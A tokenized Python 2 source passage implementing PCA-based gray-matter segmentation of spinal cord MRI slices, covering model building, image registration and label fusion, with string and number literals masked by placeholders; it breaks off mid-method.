<s> from msct_pca import PCA <EOL> from msct_gmseg_utils import * <EOL> import sct_utils as sct <EOL> import pickle <EOL> from math import sqrt <EOL> from math import exp <EOL> class Param : <EOL> def __init__ ( self ) : <EOL> self . debug = <NUM_LIT:0> <EOL> self . path_dictionary = None <EOL> self . todo_model = None <EOL> self . model_dir = '<STR_LIT>' <EOL> self . reg = [ '<STR_LIT>' ] <EOL> self . reg_metric = '<STR_LIT>' <EOL> self . target_denoising = True <EOL> self . first_reg = False <EOL> self . use_levels = True <EOL> self . weight_gamma = <NUM_LIT> <EOL> self . equation_id = <NUM_LIT:1> <EOL> self . weight_label_fusion = False <EOL> self . mode_weight_similarity = False <EOL> self . z_regularisation = False <EOL> self . res_type = '<STR_LIT>' <EOL> self . verbose = <NUM_LIT:1> <EOL> def __repr__ ( self ) : <EOL> s = '<STR_LIT>' <EOL> s += '<STR_LIT>' + str ( self . path_dictionary ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . todo_model ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . model_dir ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . reg ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . reg_metric ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . target_denoising ) + '<STR_LIT>' <EOL> s += '<STR_LIT>' + str ( self . first_reg ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . use_levels ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . weight_gamma ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . equation_id ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . weight_label_fusion ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . mode_weight_similarity ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . z_regularisation ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . res_type ) + '<STR_LIT:\n>' <EOL> s += '<STR_LIT>' + str ( self . 
verbose ) + '<STR_LIT:\n>' <EOL> return s <EOL> class ModelDictionary : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dic_param = None ) : <EOL> """<STR_LIT>""" <EOL> if dic_param is None : <EOL> self . param = Param ( ) <EOL> else : <EOL> self . param = dic_param <EOL> self . level_label = { <NUM_LIT:0> : '<STR_LIT>' , <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:2> : '<STR_LIT>' , <NUM_LIT:3> : '<STR_LIT>' , <NUM_LIT:4> : '<STR_LIT>' , <NUM_LIT:5> : '<STR_LIT>' , <NUM_LIT:6> : '<STR_LIT>' , <NUM_LIT:7> : '<STR_LIT>' , <NUM_LIT:8> : '<STR_LIT>' , <NUM_LIT:9> : '<STR_LIT>' , <NUM_LIT:10> : '<STR_LIT>' , <NUM_LIT:11> : '<STR_LIT>' , <NUM_LIT:12> : '<STR_LIT>' , <NUM_LIT> : '<STR_LIT>' } <EOL> self . coregistration_transfos = None <EOL> self . slices = None <EOL> self . J = None <EOL> self . N = None <EOL> self . mean_seg = None <EOL> self . mean_image = None <EOL> self . coregistration_transfos = self . param . reg <EOL> if self . param . todo_model == '<STR_LIT>' : <EOL> self . compute_model ( ) <EOL> elif self . param . todo_model == '<STR_LIT>' : <EOL> self . load_model ( ) <EOL> def compute_model ( self ) : <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> sct . run ( '<STR_LIT>' + self . param . model_dir ) <EOL> param_fic = open ( self . param . model_dir + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> param_fic . write ( str ( self . param ) ) <EOL> param_fic . close ( ) <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> self . slices = self . load_data_dictionary ( ) <EOL> self . J = len ( [ dic_slice . im for dic_slice in self . slices ] ) <EOL> self . N = len ( self . slices [ <NUM_LIT:0> ] . im . flatten ( ) ) <EOL> self . invert_seg ( ) <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> self . mean_seg = self . seg_coregistration ( transfo_to_apply = self . coregistration_transfos ) <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> self . 
coregister_data ( transfo_to_apply = self . coregistration_transfos ) <EOL> self . mean_image = self . compute_mean_dic_image ( np . asarray ( [ dic_slice . im_M for dic_slice in self . slices ] ) ) <EOL> self . save_model ( ) <EOL> def load_data_dictionary ( self ) : <EOL> """<STR_LIT>""" <EOL> slices = [ ] <EOL> j = <NUM_LIT:0> <EOL> for subject_dir in os . listdir ( self . param . path_dictionary ) : <EOL> subject_path = self . param . path_dictionary + '<STR_LIT:/>' + subject_dir <EOL> if os . path . isdir ( subject_path ) : <EOL> for file_name in os . listdir ( subject_path ) : <EOL> if '<STR_LIT>' in file_name : <EOL> slice_level = <NUM_LIT:0> <EOL> name_list = file_name . split ( '<STR_LIT:_>' ) <EOL> for word in name_list : <EOL> if word . upper ( ) in self . level_label . values ( ) : <EOL> slice_level = get_key_from_val ( self . level_label , word . upper ( ) ) <EOL> slices . append ( Slice ( slice_id = j , im = Image ( subject_path + '<STR_LIT:/>' + file_name ) . data , level = slice_level , reg_to_m = [ ] ) ) <EOL> seg_file = sct . extract_fname ( file_name ) [ <NUM_LIT:1> ] [ : - <NUM_LIT:3> ] + '<STR_LIT>' <EOL> slices [ j ] . set ( gm_seg = Image ( subject_path + '<STR_LIT:/>' + seg_file ) . data ) <EOL> j += <NUM_LIT:1> <EOL> return np . asarray ( slices ) <EOL> def invert_seg ( self ) : <EOL> """<STR_LIT>""" <EOL> for dic_slice in self . slices : <EOL> im_dic = Image ( param = dic_slice . im ) <EOL> sc = im_dic . copy ( ) <EOL> nz_coord_sc = sc . getNonZeroCoordinates ( ) <EOL> im_seg = Image ( param = dic_slice . gm_seg ) <EOL> '''<STR_LIT>''' <EOL> inverted_slice_decision = inverse_gmseg_to_wmseg ( im_seg , im_dic , save = False ) <EOL> dic_slice . set ( wm_seg = inverted_slice_decision . data ) <EOL> def seg_coregistration ( self , transfo_to_apply = None ) : <EOL> """<STR_LIT>""" <EOL> current_mean_seg = compute_majority_vote_mean_seg ( np . asarray ( [ dic_slice . wm_seg for dic_slice in self . 
slices ] ) ) <EOL> first = True <EOL> for transfo in transfo_to_apply : <EOL> sct . printv ( '<STR_LIT>' + transfo + '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> current_mean_seg = self . find_coregistration ( mean_seg = current_mean_seg , transfo_type = transfo , first = first ) <EOL> first = False <EOL> resulting_mean_seg = current_mean_seg <EOL> return resulting_mean_seg <EOL> def find_coregistration ( self , mean_seg = None , transfo_type = '<STR_LIT>' , first = True ) : <EOL> """<STR_LIT>""" <EOL> for dic_slice in self . slices : <EOL> name_j_transform = '<STR_LIT>' + str ( dic_slice . id ) + find_ants_transfo_name ( transfo_type ) [ <NUM_LIT:0> ] <EOL> new_reg_list = dic_slice . reg_to_M . append ( name_j_transform ) <EOL> dic_slice . set ( reg_to_m = new_reg_list ) <EOL> if first : <EOL> seg_m = apply_ants_transfo ( mean_seg , dic_slice . wm_seg , transfo_name = name_j_transform , path = self . param . model_dir + '<STR_LIT:/>' , transfo_type = transfo_type , metric = self . param . reg_metric ) <EOL> else : <EOL> seg_m = apply_ants_transfo ( mean_seg , dic_slice . wm_seg_M , transfo_name = name_j_transform , path = self . param . model_dir + '<STR_LIT:/>' , transfo_type = transfo_type , metric = self . param . reg_metric ) <EOL> dic_slice . set ( wm_seg_m = seg_m . astype ( int ) ) <EOL> dic_slice . set ( wm_seg_m_flat = seg_m . flatten ( ) . astype ( int ) ) <EOL> mean_seg = compute_majority_vote_mean_seg ( [ dic_slice . wm_seg_M for dic_slice in self . slices ] ) <EOL> return mean_seg <EOL> def compute_mean_dic_image ( self , im_data_set ) : <EOL> """<STR_LIT>""" <EOL> mean = np . sum ( im_data_set , axis = <NUM_LIT:0> ) <EOL> mean /= float ( len ( im_data_set ) ) <EOL> return mean <EOL> def coregister_data ( self , transfo_to_apply = None ) : <EOL> """<STR_LIT>""" <EOL> list_im = [ dic_slice . im for dic_slice in self . slices ] <EOL> list_gm_seg = [ dic_slice . gm_seg for dic_slice in self . slices ] <EOL> for dic_slice in self . 
slices : <EOL> for n_transfo , transfo in enumerate ( transfo_to_apply ) : <EOL> im_m = apply_ants_transfo ( self . compute_mean_dic_image ( list_im ) , dic_slice . im , search_reg = False , transfo_name = dic_slice . reg_to_M [ n_transfo ] , binary = False , path = self . param . model_dir + '<STR_LIT:/>' , transfo_type = transfo , metric = self . param . reg_metric ) <EOL> gm_seg_m = apply_ants_transfo ( compute_majority_vote_mean_seg ( list_gm_seg ) , dic_slice . gm_seg , search_reg = False , transfo_name = dic_slice . reg_to_M [ n_transfo ] , binary = True , path = self . param . model_dir + '<STR_LIT:/>' , transfo_type = transfo , metric = self . param . reg_metric ) <EOL> dic_slice . set ( im_m = im_m ) <EOL> dic_slice . set ( gm_seg_m = gm_seg_m ) <EOL> dic_slice . set ( im_m_flat = im_m . flatten ( ) ) <EOL> for transfo_type in transfo_to_apply : <EOL> transfo_dir = transfo_type . lower ( ) + '<STR_LIT>' <EOL> if transfo_dir in os . listdir ( self . param . model_dir + '<STR_LIT:/>' ) : <EOL> sct . run ( '<STR_LIT>' + self . param . model_dir + '<STR_LIT:/>' + transfo_dir + '<STR_LIT:/>' ) <EOL> def save_model ( self ) : <EOL> model_slices = np . asarray ( [ ( dic_slice . im_M , dic_slice . wm_seg_M , dic_slice . gm_seg_M , dic_slice . level ) for dic_slice in self . slices ] ) <EOL> pickle . dump ( model_slices , open ( self . param . model_dir + '<STR_LIT>' , '<STR_LIT:wb>' ) , protocol = <NUM_LIT:2> ) <EOL> def load_model ( self ) : <EOL> model_slices = pickle . load ( open ( self . param . path_dictionary + '<STR_LIT>' , '<STR_LIT:rb>' ) ) <EOL> self . slices = [ Slice ( slice_id = i_slice , level = dic_slice [ <NUM_LIT:3> ] , im_m = dic_slice [ <NUM_LIT:0> ] , wm_seg_m = dic_slice [ <NUM_LIT:1> ] , gm_seg_m = dic_slice [ <NUM_LIT:2> ] , im_m_flat = dic_slice [ <NUM_LIT:0> ] . flatten ( ) , wm_seg_m_flat = dic_slice [ <NUM_LIT:1> ] . flatten ( ) ) for i_slice , dic_slice in enumerate ( model_slices ) ] <EOL> self . J = len ( [ dic_slice . 
im_M for dic_slice in self . slices ] ) <EOL> self . N = len ( self . slices [ <NUM_LIT:0> ] . im_M_flat ) <EOL> self . mean_seg = compute_majority_vote_mean_seg ( [ dic_slice . wm_seg_M for dic_slice in self . slices ] ) <EOL> def show_dictionary_data ( self ) : <EOL> """<STR_LIT>""" <EOL> for dic_slice in self . slices [ : <NUM_LIT:10> ] : <EOL> fig = plt . figure ( ) <EOL> if dic_slice . wm_seg is not None : <EOL> seg_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> seg_subplot . set_title ( '<STR_LIT>' ) <EOL> im_seg = seg_subplot . imshow ( dic_slice . wm_seg ) <EOL> im_seg . set_interpolation ( '<STR_LIT>' ) <EOL> im_seg . set_cmap ( '<STR_LIT>' ) <EOL> seg_m_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> ) <EOL> seg_m_subplot . set_title ( '<STR_LIT>' ) <EOL> im_seg_m = seg_m_subplot . imshow ( dic_slice . wm_seg_M ) <EOL> im_seg_m . set_interpolation ( '<STR_LIT>' ) <EOL> im_seg_m . set_cmap ( '<STR_LIT>' ) <EOL> if self . mean_seg is not None : <EOL> mean_seg_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> mean_seg_subplot . set_title ( '<STR_LIT>' ) <EOL> im_mean_seg = mean_seg_subplot . imshow ( np . asarray ( self . mean_seg ) ) <EOL> im_mean_seg . set_interpolation ( '<STR_LIT>' ) <EOL> im_mean_seg . set_cmap ( '<STR_LIT>' ) <EOL> if dic_slice . im is not None : <EOL> slice_im_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> slice_im_subplot . set_title ( '<STR_LIT>' ) <EOL> im_slice_im = slice_im_subplot . imshow ( dic_slice . im ) <EOL> im_slice_im . set_interpolation ( '<STR_LIT>' ) <EOL> im_slice_im . set_cmap ( '<STR_LIT>' ) <EOL> slice_im_m_subplot = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> ) <EOL> slice_im_m_subplot . set_title ( '<STR_LIT>' ) <EOL> im_slice_im_m = slice_im_m_subplot . imshow ( dic_slice . im_M ) <EOL> im_slice_im_m . set_interpolation ( '<STR_LIT>' ) <EOL> im_slice_im_m . 
set_cmap ( '<STR_LIT>' ) <EOL> plt . suptitle ( '<STR_LIT>' + str ( dic_slice . id ) ) <EOL> plt . show ( ) <EOL> class Model : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model_param = None , k = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if model_param is None : <EOL> self . param = Param ( ) <EOL> else : <EOL> self . param = model_param <EOL> self . dictionary = ModelDictionary ( dic_param = self . param ) <EOL> sct . printv ( "<STR_LIT>" + str ( self . dictionary . N ) + "<STR_LIT:U+002C>" + str ( self . dictionary . J ) + "<STR_LIT:)>" , verbose = self . param . verbose ) <EOL> if self . param . todo_model == '<STR_LIT>' : <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> self . pca = PCA ( np . asarray ( self . dictionary . slices ) , k = k ) <EOL> self . pca . save_data ( self . param . model_dir ) <EOL> elif self . param . todo_model == '<STR_LIT>' : <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> pca_data = pickle . load ( open ( self . param . path_dictionary + '<STR_LIT>' , '<STR_LIT:rb>' ) ) <EOL> self . pca = PCA ( np . asarray ( self . dictionary . slices ) , mean_vect = pca_data [ <NUM_LIT:0> ] , eig_pairs = pca_data [ <NUM_LIT:1> ] , k = k ) <EOL> self . dictionary . mean_image = self . pca . mean_image <EOL> self . epsilon = round ( <NUM_LIT:1.0> / self . dictionary . J , <NUM_LIT:4> ) / <NUM_LIT:2> <EOL> if self . param . todo_model == '<STR_LIT>' : <EOL> self . tau = self . compute_tau ( ) <EOL> pickle . dump ( self . tau , open ( self . param . model_dir + '<STR_LIT>' , '<STR_LIT:w>' ) , protocol = <NUM_LIT:0> ) <EOL> elif self . param . todo_model == '<STR_LIT>' : <EOL> self . tau = pickle . load ( open ( self . param . path_dictionary + '<STR_LIT>' , '<STR_LIT:r>' ) ) <EOL> if self . param . verbose == <NUM_LIT:2> : <EOL> self . pca . 
plot_projected_dic ( ) <EOL> def compute_beta ( self , coord_target , target_levels = None , dataset_coord = None , dataset_levels = None , tau = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if dataset_coord is None : <EOL> dataset_coord = self . pca . dataset_coord . T <EOL> dataset_levels = [ dic_slice . level for dic_slice in self . dictionary . slices ] <EOL> beta = [ ] <EOL> if self . param . mode_weight_similarity : <EOL> mode_weight = [ val / sum ( self . pca . kept_eigenval ) for val in self . pca . kept_eigenval ] <EOL> else : <EOL> mode_weight = None <EOL> if isinstance ( coord_target [ <NUM_LIT:0> ] , ( list , np . ndarray ) ) : <EOL> for i_target , coord_projected_slice in enumerate ( coord_target ) : <EOL> beta_slice = [ ] <EOL> for j_slice , coord_slice_j in enumerate ( dataset_coord ) : <EOL> if mode_weight is None : <EOL> square_norm = np . linalg . norm ( ( coord_projected_slice - coord_slice_j ) , <NUM_LIT:2> ) <EOL> else : <EOL> from scipy . spatial . distance import wminkowski <EOL> square_norm = wminkowski ( coord_projected_slice , coord_slice_j , <NUM_LIT:2> , mode_weight ) <EOL> if target_levels is not None and target_levels is not [ None ] and self . param . use_levels : <EOL> if self . param . equation_id == <NUM_LIT:1> : <EOL> beta_slice . append ( exp ( - self . param . weight_gamma * abs ( target_levels [ i_target ] - dataset_levels [ j_slice ] ) ) * exp ( - tau * square_norm ) ) <EOL> elif self . param . equation_id == <NUM_LIT:2> : <EOL> if target_levels [ i_target ] == dataset_levels [ j_slice ] : <EOL> beta_slice . append ( exp ( tau * square_norm ) ) <EOL> else : <EOL> beta_slice . append ( exp ( - tau * square_norm ) / self . param . weight_gamma * abs ( target_levels [ i_target ] - dataset_levels [ j_slice ] ) ) <EOL> else : <EOL> beta_slice . append ( exp ( - tau * square_norm ) ) <EOL> try : <EOL> beta_slice /= np . sum ( beta_slice ) <EOL> except ZeroDivisionError : <EOL> sct . printv ( '<STR_LIT>' , self . param . 
verbose , '<STR_LIT>' ) <EOL> print beta_slice <EOL> beta . append ( beta_slice ) <EOL> else : <EOL> for j_slice , coord_slice_j in enumerate ( dataset_coord ) : <EOL> if mode_weight is None : <EOL> square_norm = np . linalg . norm ( ( coord_target - coord_slice_j ) , <NUM_LIT:2> ) <EOL> else : <EOL> from scipy . spatial . distance import wminkowski <EOL> square_norm = wminkowski ( coord_target , coord_slice_j , <NUM_LIT:2> , mode_weight ) <EOL> if target_levels is not None and self . param . use_levels : <EOL> '''<STR_LIT>''' <EOL> beta . append ( exp ( - self . param . weight_gamma * abs ( target_levels - dataset_levels [ j_slice ] ) ) * exp ( - tau * square_norm ) ) <EOL> else : <EOL> beta . append ( exp ( - tau * square_norm ) ) <EOL> try : <EOL> beta /= np . sum ( beta ) <EOL> except ZeroDivisionError : <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> print beta <EOL> return np . asarray ( beta ) <EOL> def compute_tau ( self ) : <EOL> """<STR_LIT>""" <EOL> sct . printv ( '<STR_LIT>' <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> from scipy . optimize import minimize <EOL> def to_minimize ( tau ) : <EOL> """<STR_LIT>""" <EOL> sum_norm = <NUM_LIT:0> <EOL> for dic_slice in self . dictionary . slices : <EOL> projected_dic_slice_coord = self . pca . project_array ( dic_slice . im_M_flat ) <EOL> coord_dic_slice_dataset = np . delete ( self . pca . dataset_coord . T , dic_slice . id , <NUM_LIT:0> ) <EOL> if self . param . use_levels : <EOL> dic_slice_dataset_levels = np . delete ( np . asarray ( dic_levels ) , dic_slice . id , <NUM_LIT:0> ) <EOL> beta_dic_slice = self . compute_beta ( projected_dic_slice_coord , target_levels = dic_slice . level , dataset_coord = coord_dic_slice_dataset , dataset_levels = dic_slice_dataset_levels , tau = tau ) <EOL> else : <EOL> beta_dic_slice = self . 
compute_beta ( projected_dic_slice_coord , target_levels = None , dataset_coord = coord_dic_slice_dataset , dataset_levels = None , tau = tau ) <EOL> kj = self . select_k_slices ( beta_dic_slice ) <EOL> if self . param . weight_label_fusion : <EOL> est_segm_j = self . label_fusion ( dic_slice , kj , beta = beta_dic_slice ) [ <NUM_LIT:0> ] <EOL> else : <EOL> est_segm_j = self . label_fusion ( dic_slice , kj ) [ <NUM_LIT:0> ] <EOL> sum_norm += l0_norm ( dic_slice . wm_seg_M , est_segm_j . data ) <EOL> return sum_norm <EOL> dic_levels = [ dic_slice . level for dic_slice in self . dictionary . slices ] <EOL> est_tau = minimize ( to_minimize , <NUM_LIT> , method = '<STR_LIT>' , options = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> sct . printv ( '<STR_LIT>' + str ( est_tau . x [ <NUM_LIT:0> ] ) ) <EOL> return float ( est_tau . x [ <NUM_LIT:0> ] ) <EOL> def select_k_slices ( self , beta ) : <EOL> """<STR_LIT>""" <EOL> kept_slice_index = [ ] <EOL> if isinstance ( beta [ <NUM_LIT:0> ] , ( list , np . ndarray ) ) : <EOL> for beta_slice in beta : <EOL> selected_index = beta_slice > self . epsilon <EOL> kept_slice_index . append ( selected_index ) <EOL> else : <EOL> kept_slice_index = beta > self . epsilon <EOL> return np . asarray ( kept_slice_index ) <EOL> def label_fusion ( self , target , selected_index , beta = None , type = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> wm_segmentation_slices = np . asarray ( [ dic_slice . wm_seg_M for dic_slice in self . dictionary . slices ] ) <EOL> gm_segmentation_slices = np . asarray ( [ dic_slice . gm_seg_M for dic_slice in self . dictionary . slices ] ) <EOL> res_wm_seg_model_space = [ ] <EOL> res_gm_seg_model_space = [ ] <EOL> if isinstance ( selected_index [ <NUM_LIT:0> ] , ( list , np . ndarray ) ) : <EOL> for i , selected_ind_by_slice in enumerate ( selected_index ) : <EOL> if beta is None : <EOL> n_selected_dic_slices = wm_segmentation_slices [ selected_ind_by_slice ] . 
shape [ <NUM_LIT:0> ] <EOL> weights = [ <NUM_LIT:1.0> / n_selected_dic_slices ] * n_selected_dic_slices <EOL> else : <EOL> weights = beta [ i ] [ selected_ind_by_slice ] <EOL> weights = [ w / sum ( weights ) for w in weights ] <EOL> wm_slice_seg = compute_majority_vote_mean_seg ( wm_segmentation_slices [ selected_ind_by_slice ] , weights = weights , type = type , threshold = <NUM_LIT> ) <EOL> res_wm_seg_model_space . append ( wm_slice_seg ) <EOL> target [ i ] . set ( wm_seg_m = wm_slice_seg ) <EOL> gm_slice_seg = compute_majority_vote_mean_seg ( gm_segmentation_slices [ selected_ind_by_slice ] , weights = weights , type = type ) <EOL> res_gm_seg_model_space . append ( gm_slice_seg ) <EOL> target [ i ] . set ( gm_seg_m = gm_slice_seg ) <EOL> else : <EOL> if beta is None : <EOL> n_selected_dic_slices = wm_segmentation_slices [ selected_index ] . shape [ <NUM_LIT:0> ] <EOL> weights = [ <NUM_LIT:1.0> / n_selected_dic_slices ] * n_selected_dic_slices <EOL> else : <EOL> weights = beta [ selected_index ] <EOL> weights = [ w / sum ( weights ) for w in weights ] <EOL> res_wm_seg_model_space = compute_majority_vote_mean_seg ( wm_segmentation_slices [ selected_index ] , weights = weights , type = type , threshold = <NUM_LIT> ) <EOL> res_gm_seg_model_space = compute_majority_vote_mean_seg ( gm_segmentation_slices [ selected_index ] , weights = weights , type = type ) <EOL> res_wm_seg_model_space = np . asarray ( res_wm_seg_model_space ) <EOL> res_gm_seg_model_space = np . asarray ( res_gm_seg_model_space ) <EOL> return Image ( param = res_wm_seg_model_space ) , Image ( param = res_gm_seg_model_space ) <EOL> class TargetSegmentationPairwise : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , target_image = None , levels_image = None , epsilon = None ) : <EOL> """<STR_LIT>""" <EOL> self . model = model <EOL> if len ( target_image . data . shape ) == <NUM_LIT:3> : <EOL> self . 
target = [ Slice ( slice_id = i_slice , im = target_slice , reg_to_m = [ ] ) for i_slice , target_slice in enumerate ( target_image . data ) ] <EOL> self . target_dim = <NUM_LIT:3> <EOL> elif len ( target_image . data . shape ) == <NUM_LIT:2> : <EOL> self . target = [ Slice ( slice_id = <NUM_LIT:0> , im = target_image . data , reg_to_m = [ ] ) ] <EOL> self . target_dim = <NUM_LIT:2> <EOL> if levels_image is not None and self . model . param . use_levels : <EOL> self . load_level ( levels_image ) <EOL> if self . model . param . first_reg : <EOL> self . first_reg ( ) <EOL> self . target_pairwise_registration ( ) <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> self . coord_projected_target = model . pca . project ( [ target_slice . im_M for target_slice in self . target ] ) <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> if levels_image is not None and self . model . param . use_levels : <EOL> self . beta = self . model . compute_beta ( self . coord_projected_target , target_levels = np . asarray ( [ target_slice . level for target_slice in self . target ] ) , tau = self . model . tau ) <EOL> else : <EOL> self . beta = self . model . compute_beta ( self . coord_projected_target , tau = self . model . tau ) <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> self . selected_k_slices = self . model . select_k_slices ( self . beta ) <EOL> self . save_selected_slices ( target_image . file_name [ : - <NUM_LIT:3> ] ) <EOL> if self . model . param . verbose == <NUM_LIT:2> : <EOL> self . plot_projected_dic ( nb_modes = <NUM_LIT:3> , to_highlight = '<STR_LIT:all>' ) <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> if self . model . param . weight_label_fusion : <EOL> use_beta = self . beta <EOL> else : <EOL> use_beta = None <EOL> self . model . label_fusion ( self . target , self . selected_k_slices , beta = use_beta , type = self . model . param . 
res_type ) <EOL> if self . model . param . z_regularisation : <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> self . z_regularisation_2d_iteration ( ) <EOL> sct . printv ( '<STR_LIT>' , <EOL> model . param . verbose , '<STR_LIT>' ) <EOL> self . target_pairwise_registration ( inverse = True ) <EOL> def load_level ( self , level_image ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( level_image , Image ) : <EOL> nz_coord = level_image . getNonZeroCoordinates ( ) <EOL> for i_level_slice , level_slice in enumerate ( level_image . data ) : <EOL> nz_val = [ ] <EOL> for coord in nz_coord : <EOL> if coord . x == i_level_slice : <EOL> nz_val . append ( level_slice [ coord . y , coord . z ] ) <EOL> try : <EOL> self . target [ i_level_slice ] . set ( level = int ( round ( sum ( nz_val ) / len ( nz_val ) ) ) ) <EOL> except ZeroDivisionError : <EOL> sct . printv ( '<STR_LIT>' + str ( i_level_slice ) + '<STR_LIT>' , self . model . param . verbose , '<STR_LIT>' ) <EOL> self . target [ i_level_slice ] . set ( level = <NUM_LIT:0> ) <EOL> elif isinstance ( level_image , str ) : <EOL> self . target [ <NUM_LIT:0> ] . set ( level = get_key_from_val ( self . model . dictionary . level_label , level_image . upper ( ) ) ) <EOL> def first_reg ( self ) : <EOL> """<STR_LIT>""" <EOL> mean_sc_seg = ( np . asarray ( self . model . pca . mean_image ) > <NUM_LIT:0> ) . astype ( int ) <EOL> save_image ( self . model . pca . mean_image , '<STR_LIT>' ) <EOL> for i , target_slice in enumerate ( self . target ) : <EOL> moving_target_seg = ( np . asarray ( target_slice . im ) > <NUM_LIT:0> ) . astype ( int ) <EOL> transfo = '<STR_LIT>' <EOL> transfo_name = transfo + '<STR_LIT>' + str ( i ) + find_ants_transfo_name ( transfo ) [ <NUM_LIT:0> ] <EOL> apply_ants_transfo ( mean_sc_seg , moving_target_seg , binary = True , apply_transfo = False , transfo_type = transfo , transfo_name = transfo_name , metric = self . model . param . 
reg_metric ) <EOL> moved_target_slice = apply_ants_transfo ( mean_sc_seg , target_slice . im , binary = False , search_reg = False , transfo_type = transfo , transfo_name = transfo_name , metric = self . model . param . reg_metric ) <EOL> target_slice . set ( im_m = moved_target_slice ) <EOL> target_slice . reg_to_M . append ( ( transfo , transfo_name ) ) <EOL> save_image ( target_slice . im , '<STR_LIT>' + str ( target_slice . id ) + '<STR_LIT>' ) <EOL> save_image ( target_slice . im_M , '<STR_LIT>' + str ( target_slice . id ) + '<STR_LIT>' ) <EOL> def target_pairwise_registration ( self , inverse = False ) : <EOL> """<STR_LIT>""" <EOL> if not inverse : <EOL> mean_dic_im = self . model . pca . mean_image <EOL> for i , target_slice in enumerate ( self . target ) : <EOL> if not self . model . param . first_reg : <EOL> moving_target_slice = target_slice . im <EOL> else : <EOL> moving_target_slice = target_slice . im_M <EOL> for transfo in self . model . dictionary . coregistration_transfos : <EOL> transfo_name = transfo + '<STR_LIT>' + str ( i ) + find_ants_transfo_name ( transfo ) [ <NUM_LIT:0> ] <EOL> target_slice . reg_to_M . append ( ( transfo , transfo_name ) ) <EOL> moving_target_slice = apply_ants_transfo ( mean_dic_im , moving_target_slice , binary = False , transfo_type = transfo , transfo_name = transfo_name , metric = self . model . param . reg_metric ) <EOL> self . target [ i ] . set ( im_m = moving_target_slice ) <EOL> else : <EOL> for i , target_slice in enumerate ( self . target ) : <EOL> moving_wm_seg_slice = target_slice . wm_seg_M <EOL> moving_gm_seg_slice = target_slice . gm_seg_M <EOL> for transfo in target_slice . reg_to_M : <EOL> if self . model . param . res_type == '<STR_LIT>' : <EOL> bin = True <EOL> else : <EOL> bin = False <EOL> moving_wm_seg_slice = apply_ants_transfo ( self . model . dictionary . 
mean_seg , moving_wm_seg_slice , search_reg = False , binary = bin , inverse = <NUM_LIT:1> , transfo_type = transfo [ <NUM_LIT:0> ] , transfo_name = transfo [ <NUM_LIT:1> ] , metric = self . model . param . reg_metric ) <EOL> moving_gm_seg_slice = apply_ants_transfo ( self . model . dictionary . mean_seg , moving_gm_seg_slice , search_reg = False , binary = bin , inverse = <NUM_LIT:1> , transfo_type = transfo [ <NUM_LIT:0> ] , transfo_name = transfo [ <NUM_LIT:1> ] , metric = self . model . param . reg_metric ) <EOL> target_slice . set ( wm_seg = moving_wm_seg_slice ) <EOL> target_slice . set ( gm_seg = moving_gm_seg_slice ) <EOL> def z_regularisation_2d_iteration ( self , coeff = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> for i , target_slice in enumerate ( self . target [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) : <EOL> adjacent_wm_seg = [ ] <EOL> adjacent_gm_seg = [ ] <EOL> precision = <NUM_LIT:100> <EOL> print int ( precision * coeff ) <EOL> for k in range ( int ( precision * coeff ) ) : <EOL> adjacent_wm_seg . append ( self . target [ i - <NUM_LIT:1> ] . wm_seg_M ) <EOL> adjacent_wm_seg . append ( self . target [ i + <NUM_LIT:1> ] . wm_seg_M ) <EOL> adjacent_gm_seg . append ( self . target [ i - <NUM_LIT:1> ] . gm_seg_M ) <EOL> adjacent_gm_seg . append ( self . target [ i + <NUM_LIT:1> ] . gm_seg_M 